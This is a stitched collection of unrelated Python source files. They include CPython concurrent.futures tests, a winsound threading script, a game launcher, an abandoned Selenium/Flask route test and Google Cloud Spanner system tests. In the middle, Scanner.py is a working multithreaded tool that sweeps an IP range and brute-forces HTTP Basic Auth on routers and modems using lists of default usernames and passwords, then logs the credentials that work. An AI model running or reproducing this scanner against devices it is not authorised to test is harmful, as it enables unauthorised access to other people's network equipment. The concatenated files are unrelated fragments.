finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
self.assertEqual(executor._max_workers,
(os.cpu_count() or 1) * 5)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest, unittest.TestCase):
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
class FutureTests(unittest.TestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
@test.support.reap_threads
def test_main():
try:
test.support.run_unittest(__name__)
finally:
test.support.reap_children()
if __name__ == "__main__":
test_main()
|
test2.py | import winsound
from threading import Thread
from concurrent import futures
import threading # Python 3 threading module
import time
from concurrent.futures import ThreadPoolExecutor
r = True
def play_sound():
# winsound.PlaySound("dank", winsound.SND_ALIAS)
# winsound.PlaySound(r"dank")
global r
if r:
r = False
winsound.PlaySound("dank", winsound.SND_ALIAS)
r = True
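# Note: the global flag r is read and reset without a lock, so two workers
# can both observe r == True and play the sound concurrently; wrapping the
# check-and-set in a threading.Lock would make it atomic.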
def job1():
print('running job 1')
def job2():
print('running job 2')
def job3():
print('running job 3')
if __name__ == '__main__':
# for i in range(5):
# thread = Thread(target=play_sound)
# thread.start()
pool = ThreadPoolExecutor(max_workers=3) # thread pool of size 3
future1 = pool.submit(play_sound)
future2 = pool.submit(play_sound) # add the task to the thread pool
pool.shutdown() # shut down the thread pool
|
utopia.py | # Note: Use reflection to initialize custom GameServer.py
#from person import Person
#theObj = globals()["Person"]()
#print theObj.getName()
# Utopia - A government simulator that works
# Aurura 2017. Published under the MITv3 License.
# https://github.com/xhj1102/Utopia
#
# Entry for command-line interaction.
# utopia.py - Main Program
#
import time
from multiprocessing import Process, Queue
import lib.GameServer as GameServer
# .fjttii;iijfjtiitjft
# :ffjttttitjjfjttjjjjjttt.
# :ffjLffjjjjffftjjjjfffttit
# :GLGGLLLLLffffjjttjjfLfLLft,
# GLGGGGLGLLLLffLjtjitjLjjjtjt
# GLGGDGLGGLGGfLLLjjftttfjjjjtt
# LGGDDDGDGGGGGGDGfjitjjjGLGDfj,
# ,EGDDDDDGGGLGLGLGGfjfjjjfLGfjfL
# #EDDDGEEDDGGGGLGDEfLffjGGfjtjf
# WDDDDDDEDDDGGfLLGDEDfjf#fDtttf
# WDEDDDGDGGDEDfLLGDDKKKG Lijj:
# KEKEDDGGGEDKLjLGGG#KKEK ..fi:
# .GKKEDGLGEKELLGLLtKEGGD LLi
# : GGKKDGGG;i.GfLfG DGGD jfG
# W DGEWEDDD tLfLD GLLL .fG
# W DDKt LDD LfL: ffLL fL
# # EK:. GD LLL DGG fL
# .EK GG LLL DGG ,f,
# EEK GG: LfG ,Lf Kf
# DDW GGG ffLGE LL fL
# :DDL EGLffGDK GD G
# :DGD GLGLE Gf, L
# EEDD, GD , .fLL. .L
def createTimeServer(queue):
server = GameServer.GameServer(queue)
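# Entry point: hand the server a Queue for cross-process messages and run it
# in a child process so the command line stays responsive.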
q = Queue()
p = Process(target=createTimeServer, args=(q,))
p.start()
|
~test_selenium.py | # this is an old test built to use selenium on a hybrid flask test including selenium.
# This test is probably abandoned and will never be revised to confirm whether it continues to work,
# but it does contain some useful architecture for debugging selenium tests.
import threading
import traceback
from time import sleep
from pprint import pprint
import re
import subprocess
from api import mobile_api
from selenium import webdriver
from selenium.common.exceptions import (ElementNotVisibleException, WebDriverException,
NoSuchElementException, InvalidElementStateException)
from selenium.webdriver.common.by import By
from selenium.webdriver.support.expected_conditions import visibility_of_element_located
from selenium.webdriver.support.select import Select
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.chrome.options import Options
from django.test import TransactionTestCase, SimpleTestCase
from database.study_models import Study
from database.user_models import Researcher
from pages import admin_pages
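# NOTE: WEBDRIVER_LOC, subdomain and flask_app are assumed to be provided by
# the original project's settings/app modules; they are not defined here.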
PAGE_RESPONSES = {
'400': '</head><body><h1>Bad Request</h1>',
'401': "<p>The server could not verify that you are authorized to access the URL requested. You either supplied the wrong credentials (e.g. a bad password), or your browser doesn't understand how to supply the credentials required.</p>",
'403': "<p>You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.</p>",
'404': '<h1 class="center">404 Page Not Found</h1>',
'405': "<p>The method is not allowed for the requested URL.</p>",
'500': '<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>',
}
ADMIN_PAGES = {
'/reset_download_api_credentials': {'method': 'pass'},
'/reset_admin_password': {'method': 'pass'},
'/manage_credentials': {'method': 'get'},
'/validate_login': {'method': 'pass'},
'/choose_study': {'method': 'get'},
'/logout': {'method': 'pass'},
'/admin': {'method': 'get'},
'/': {'method': 'get'},
'/data-pipeline/<string:study_id>': {'method': 'get_param'},
'/view_study/<string:study_id>': {'method': 'get_param'},
'/static/<path:filename>': {'method': 'pass'},
}
def pause_if_error(func):
def inner_pause_if_error(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
print("==============================================")
if isinstance(e, AssertionError):
pprint(e)
print("==============================================")
input()
raise
traceback.print_exc()
print("==============================================")
print("Press enter to exit")
input()
raise
return inner_pause_if_error
class FlaskTest(TransactionTestCase):
@classmethod
def setUpClass(cls):
chrome_options = Options()
cls.selenium = webdriver.Chrome(WEBDRIVER_LOC,
chrome_options=chrome_options)
cls.selenium.set_page_load_timeout(10)
cls.flask_task = threading.Thread(target=run_flask)
# Make thread a daemon so the main thread won't wait for it to close
cls.flask_task.daemon = True
# Start thread
cls.flask_task.start()
sleep(1)
super(FlaskTest, cls).setUpClass()
@classmethod
def tearDownClass(cls):
# end flask thread by giving it a timeout
cls.flask_task.join(.1)
cls.selenium.close()
super(FlaskTest, cls).tearDownClass()
class TestRoutes(FlaskTest):
def setUp(self):
pass
def tearDown(self):
pass
@pause_if_error
def test_all_routes(self):
"""
Tests urls
"""
app2 = subdomain("frontend")
app2.register_blueprint(admin_pages.admin_pages)
long_encryption_key = 'aabbccddefggiijjkklmnoppqqrrsstt'
researcher = Researcher.create_with_password('test_user', 'test_password')
researcher.admin = True
researcher.reset_access_credentials()
researcher.save()
study = Study.create_with_object_id(name='test_study', encryption_key=long_encryption_key)
researcher.studies.add(study)
self.selenium.get("localhost:54321")
self.selenium.find_element_by_name('username').send_keys('test_user')
self.selenium.find_element_by_name('password').send_keys('test_password')
self.selenium.find_element_by_name('submit').click()
for rule in app2.url_map.iter_rules():
str_rule = str(rule)
self.assertIn(str_rule, ADMIN_PAGES)
if ADMIN_PAGES[str_rule]['method'] == 'get':
self.selenium.get("localhost:54321" + str_rule)
elif ADMIN_PAGES[str_rule]['method'] == 'post':
continue
elif ADMIN_PAGES[str_rule]['method'] == 'get_param':
str_rule_formatted = re.sub(r"<\w+:\w+>", str(study.id), str_rule)
self.selenium.get("localhost:54321" + str_rule_formatted)
else:
continue
response = self.determine_errors()
self.assertEqual(response, '200')
def determine_errors(self):
responses = []
for response_code, page_response in PAGE_RESPONSES.items():
if page_response in self.selenium.page_source:
responses.append(response_code)
if len(responses) > 1:
raise Exception("One page has indicators of multiple page responses")
elif len(responses) == 1:
return responses[0]
else:
return "200"
def run_flask():
flask_app.run(host='0.0.0.0', port=54321, debug=False)
|
Scanner.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
import urllib2
import base64
import time
import sys
start_time = None
current_host = None
hosts_scanned = 0
found = []
usernames = ['admin', 'Admin', 'sysadmin', 'superuser', 'comcast', 'root', 'cisco', 'administrator', 'Administrator', 'netman', 'Any', '']
passwords = ['admin', 'sysadmin', 'password', 'changeme', 'comcast', 'root', 'cisco', '1234', '2wire', 'Wireless', 'netgear1', '']
units = [1 << (8 * i) for i in range(3, -1, -1)]
def ip_to_int(ip):
return sum(int(byte) * unit for (byte, unit) in zip(ip.split('.'), units))
def int_to_ip(i):
return '.'.join(str((i / bit) & 0xff) for bit in units)
def isBasicAuth(host, timeout):
response = None
try:
response = urllib2.urlopen('http://'+host, timeout=timeout)
except urllib2.HTTPError as exc:
response = exc
except:
return False
header = response.info().getheader('WWW-Authenticate')
if header and header.lower().startswith('basic'):
return True
else:
return False
def update_stats():
sys.stdout.write('\r|%d\t\t|%d\t\t|%d\t\t|%s.*' % (len(found), int(hosts_scanned / (time.time() - start_time)), threading.activeCount()-1, '.'.join(current_host.split('.')[0:3])))
sys.stdout.flush()
def brute_force(host, timeout, semaphore_object):
global found
global current_host
global hosts_scanned
current_host = host
if isBasicAuth(host, timeout):
for username in usernames:
for password in passwords:
try:
openedRequest = urllib2.urlopen(urllib2.Request('http://'+host, None, {'Authorization':'Basic %s' % base64.encodestring('%s:%s' % (username, password)).replace('\n', '')}), timeout=timeout)
if openedRequest:
if ('router' in openedRequest.read().lower()) | ('modem' in openedRequest.read().lower()):
found.append('%s:%s:%s' % (host, username, password))
hosts_scanned += 1
update_stats()
semaphore_object.release()
return None
except:
pass
hosts_scanned += 1
update_stats()
semaphore_object.release()
else:
hosts_scanned += 1
update_stats()
semaphore_object.release()
def main():
global start_time
if len(sys.argv) < 6:
print 'Usage: python %s [START-IP] [END-IP] [OUTPUT-FILE] [THREADS] [TIMEOUT]' % sys.argv[0]
sys.exit()
threads = []
semaphore = threading.BoundedSemaphore(value=int(sys.argv[4]))
ips = (int_to_ip(i) for i in xrange(ip_to_int(sys.argv[1]), ip_to_int(sys.argv[2])))
print 'Starting Scan...\nFound\t\tHost/s\t\tThreads\t\tCurrent'
start_time = time.time()
for ip in ips:
semaphore.acquire()
thread = threading.Thread(target=brute_force, args=(ip, float(sys.argv[5]), semaphore))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
print '\nWriting data to file...'
with open(sys.argv[3], 'a') as out_file:
for fd in found:
out_file.write('http://' + fd + '\n')
if __name__ == '__main__':
main()
|
test_system.py | # Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import math
import operator
import os
import struct
import threading
import time
import unittest
from google.cloud.spanner_v1.proto.type_pb2 import ARRAY
from google.cloud.spanner_v1.proto.type_pb2 import BOOL
from google.cloud.spanner_v1.proto.type_pb2 import BYTES
from google.cloud.spanner_v1.proto.type_pb2 import DATE
from google.cloud.spanner_v1.proto.type_pb2 import FLOAT64
from google.cloud.spanner_v1.proto.type_pb2 import INT64
from google.cloud.spanner_v1.proto.type_pb2 import STRING
from google.cloud.spanner_v1.proto.type_pb2 import TIMESTAMP
from google.cloud.spanner_v1.proto.type_pb2 import Type
from google.gax.grpc import exc_to_code
from google.gax import errors
from grpc import StatusCode
from google.cloud._helpers import UTC
from google.cloud.exceptions import GrpcRendezvous
from google.cloud.spanner_v1._helpers import TimestampWithNanoseconds
from google.cloud.spanner import Client
from google.cloud.spanner import KeyRange
from google.cloud.spanner import KeySet
from google.cloud.spanner import BurstyPool
from test_utils.retry import RetryErrors
from test_utils.retry import RetryInstanceState
from test_utils.retry import RetryResult
from test_utils.system import unique_resource_id
from tests._fixtures import DDL_STATEMENTS
CREATE_INSTANCE = os.getenv(
'GOOGLE_CLOUD_TESTS_CREATE_SPANNER_INSTANCE') is not None
if CREATE_INSTANCE:
INSTANCE_ID = 'google-cloud' + unique_resource_id('-')
else:
INSTANCE_ID = os.environ.get('GOOGLE_CLOUD_TESTS_SPANNER_INSTANCE',
'google-cloud-python-systest')
DATABASE_ID = 'test_database'
EXISTING_INSTANCES = []
COUNTERS_TABLE = 'counters'
COUNTERS_COLUMNS = ('name', 'value')
class Config(object):
"""Run-time configuration to be modified at set-up.
This is a mutable stand-in to allow test set-up to modify
global state.
"""
CLIENT = None
INSTANCE_CONFIG = None
INSTANCE = None
def _retry_on_unavailable(exc):
"""Retry only errors whose status code is 'UNAVAILABLE'."""
return exc.code() == StatusCode.UNAVAILABLE
def _has_all_ddl(database):
return len(database.ddl_statements) == len(DDL_STATEMENTS)
def _list_instances():
return list(Config.CLIENT.list_instances())
def setUpModule():
Config.CLIENT = Client()
retry = RetryErrors(GrpcRendezvous, error_predicate=_retry_on_unavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
# Defend against back-end returning configs for regions we aren't
# actually allowed to use.
configs = [config for config in configs if '-us-' in config.name]
if len(configs) < 1:
raise ValueError('List instance configs failed in module set up.')
Config.INSTANCE_CONFIG = configs[0]
config_name = configs[0].name
instances = retry(_list_instances)()
EXISTING_INSTANCES[:] = instances
if CREATE_INSTANCE:
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID, config_name)
created_op = Config.INSTANCE.create()
created_op.result(30) # block until completion
else:
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID)
Config.INSTANCE.reload()
def tearDownModule():
if CREATE_INSTANCE:
Config.INSTANCE.delete()
class TestInstanceAdminAPI(unittest.TestCase):
def setUp(self):
self.instances_to_delete = []
def tearDown(self):
for instance in self.instances_to_delete:
instance.delete()
def test_list_instances(self):
instances = list(Config.CLIENT.list_instances())
# We have added one new instance in `setUpModule`.
if CREATE_INSTANCE:
self.assertEqual(len(instances), len(EXISTING_INSTANCES) + 1)
for instance in instances:
instance_existence = (instance in EXISTING_INSTANCES or
instance == Config.INSTANCE)
self.assertTrue(instance_existence)
def test_reload_instance(self):
# Use same arguments as Config.INSTANCE (created in `setUpModule`)
# so we can use reload() on a fresh instance.
instance = Config.CLIENT.instance(
INSTANCE_ID, Config.INSTANCE_CONFIG.name)
# Make sure metadata unset before reloading.
instance.display_name = None
instance.reload()
self.assertEqual(instance.display_name, Config.INSTANCE.display_name)
@unittest.skipUnless(CREATE_INSTANCE, 'Skipping instance creation')
def test_create_instance(self):
ALT_INSTANCE_ID = 'new' + unique_resource_id('-')
instance = Config.CLIENT.instance(
ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name)
operation = instance.create()
# Make sure this instance gets deleted after the test case.
self.instances_to_delete.append(instance)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a new Instance object and make sure it is the same.
instance_alt = Config.CLIENT.instance(
ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name)
instance_alt.reload()
self.assertEqual(instance, instance_alt)
self.assertEqual(instance.display_name, instance_alt.display_name)
def test_update_instance(self):
OLD_DISPLAY_NAME = Config.INSTANCE.display_name
NEW_DISPLAY_NAME = 'Foo Bar Baz'
Config.INSTANCE.display_name = NEW_DISPLAY_NAME
operation = Config.INSTANCE.update()
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a new Instance object and reload it.
instance_alt = Config.CLIENT.instance(INSTANCE_ID, None)
self.assertNotEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
instance_alt.reload()
self.assertEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
# Make sure to put the instance back the way it was for the
# other test cases.
Config.INSTANCE.display_name = OLD_DISPLAY_NAME
Config.INSTANCE.update()
class _TestData(object):
TABLE = 'contacts'
COLUMNS = ('contact_id', 'first_name', 'last_name', 'email')
ROW_DATA = (
(1, u'Phred', u'Phlyntstone', u'phred@example.com'),
(2, u'Bharney', u'Rhubble', u'bharney@example.com'),
(3, u'Wylma', u'Phlyntstone', u'wylma@example.com'),
)
ALL = KeySet(all_=True)
SQL = 'SELECT * FROM contacts ORDER BY contact_id'
def _assert_timestamp(self, value, nano_value):
self.assertIsInstance(value, datetime.datetime)
self.assertIsNone(value.tzinfo)
self.assertIs(nano_value.tzinfo, UTC)
self.assertEqual(value.year, nano_value.year)
self.assertEqual(value.month, nano_value.month)
self.assertEqual(value.day, nano_value.day)
self.assertEqual(value.hour, nano_value.hour)
self.assertEqual(value.minute, nano_value.minute)
self.assertEqual(value.second, nano_value.second)
self.assertEqual(value.microsecond, nano_value.microsecond)
if isinstance(value, TimestampWithNanoseconds):
self.assertEqual(value.nanosecond, nano_value.nanosecond)
else:
self.assertEqual(value.microsecond * 1000, nano_value.nanosecond)
def _check_row_data(self, row_data, expected=None):
if expected is None:
expected = self.ROW_DATA
self.assertEqual(len(row_data), len(expected))
for found, expected in zip(row_data, expected):
self.assertEqual(len(found), len(expected))
for found_cell, expected_cell in zip(found, expected):
if isinstance(found_cell, TimestampWithNanoseconds):
self._assert_timestamp(expected_cell, found_cell)
elif isinstance(found_cell, float) and math.isnan(found_cell):
self.assertTrue(math.isnan(expected_cell))
else:
self.assertEqual(found_cell, expected_cell)
class TestDatabaseAPI(unittest.TestCase, _TestData):
@classmethod
def setUpClass(cls):
pool = BurstyPool()
cls._db = Config.INSTANCE.database(
DATABASE_ID, ddl_statements=DDL_STATEMENTS, pool=pool)
cls._db.create()
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.drop()
def test_list_databases(self):
# Since `Config.INSTANCE` is newly created in `setUpModule`, the
# database created in `setUpClass` here will be the only one.
databases = list(Config.INSTANCE.list_databases())
self.assertEqual(databases, [self._db])
def test_create_database(self):
pool = BurstyPool()
temp_db_id = 'temp-db' # test w/ hyphen
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
name_attr = operator.attrgetter('name')
expected = sorted([temp_db, self._db], key=name_attr)
databases = list(Config.INSTANCE.list_databases())
found = sorted(databases, key=name_attr)
self.assertEqual(found, expected)
def test_update_database_ddl(self):
pool = BurstyPool()
temp_db_id = 'temp_db'
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
create_op.result(90) # raises on failure / timeout.
operation = temp_db.update_ddl(DDL_STATEMENTS)
# We want to make sure the operation completes.
operation.result(90) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(len(temp_db.ddl_statements), len(DDL_STATEMENTS))
def test_db_batch_insert_then_db_snapshot_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
from_snap = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(from_snap)
def test_db_run_in_transaction_then_snapshot_execute_sql(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
rows = list(transaction.read(test.TABLE, test.COLUMNS, self.ALL))
test.assertEqual(rows, [])
transaction.insert_or_update(
test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_row_data(rows)
def test_db_run_in_transaction_twice(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
transaction.insert_or_update(
test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_row_data(rows)
def test_db_run_in_transaction_twice_4181(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
def _unit_of_work(transaction, name):
transaction.insert(COUNTERS_TABLE, COUNTERS_COLUMNS, [[name, 0]])
self._db.run_in_transaction(_unit_of_work, name='id_1')
with self.assertRaises(errors.RetryError) as expected:
self._db.run_in_transaction(_unit_of_work, name='id_1')
self.assertEqual(
exc_to_code(expected.exception.cause), StatusCode.ALREADY_EXISTS)
self._db.run_in_transaction(_unit_of_work, name='id_2')
with self._db.snapshot() as after:
rows = list(after.read(
COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self.assertEqual(len(rows), 2)
class TestSessionAPI(unittest.TestCase, _TestData):
ALL_TYPES_TABLE = 'all_types'
ALL_TYPES_COLUMNS = (
'list_goes_on',
'are_you_sure',
'raw_data',
'hwhen',
'approx_value',
'eye_d',
'description',
'exactly_hwhen',
)
SOME_DATE = datetime.date(2011, 1, 17)
SOME_TIME = datetime.datetime(1989, 1, 17, 17, 59, 12, 345612)
NANO_TIME = TimestampWithNanoseconds(1995, 8, 31, nanosecond=987654321)
OTHER_NAN, = struct.unpack('<d', b'\x01\x00\x01\x00\x00\x00\xf8\xff')
BYTES_1 = b'Ymlu'
BYTES_2 = b'Ym9vdHM='
ALL_TYPES_ROWDATA = (
([], False, None, None, 0.0, None, None, None),
([1], True, BYTES_1, SOME_DATE, 0.0, 19, u'dog', SOME_TIME),
([5, 10], True, BYTES_1, None, 1.25, 99, u'cat', None),
([], False, BYTES_2, None, float('inf'), 107, u'frog', None),
([3, None, 9], False, None, None, float('-inf'), 207, None, None),
([], False, None, None, float('nan'), 1207, None, None),
([], False, None, None, OTHER_NAN, 2000, None, NANO_TIME),
)
@classmethod
def setUpClass(cls):
pool = BurstyPool()
cls._db = Config.INSTANCE.database(
DATABASE_ID, ddl_statements=DDL_STATEMENTS, pool=pool)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.delete()
def test_session_crud(self):
retry_true = RetryResult(operator.truth)
retry_false = RetryResult(operator.not_)
session = self._db.session()
self.assertFalse(session.exists())
session.create()
retry_true(session.exists)()
session.delete()
retry_false(session.exists)()
def test_batch_insert_then_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
batch = session.batch()
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
batch.commit()
snapshot = session.snapshot(read_timestamp=batch.committed)
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows)
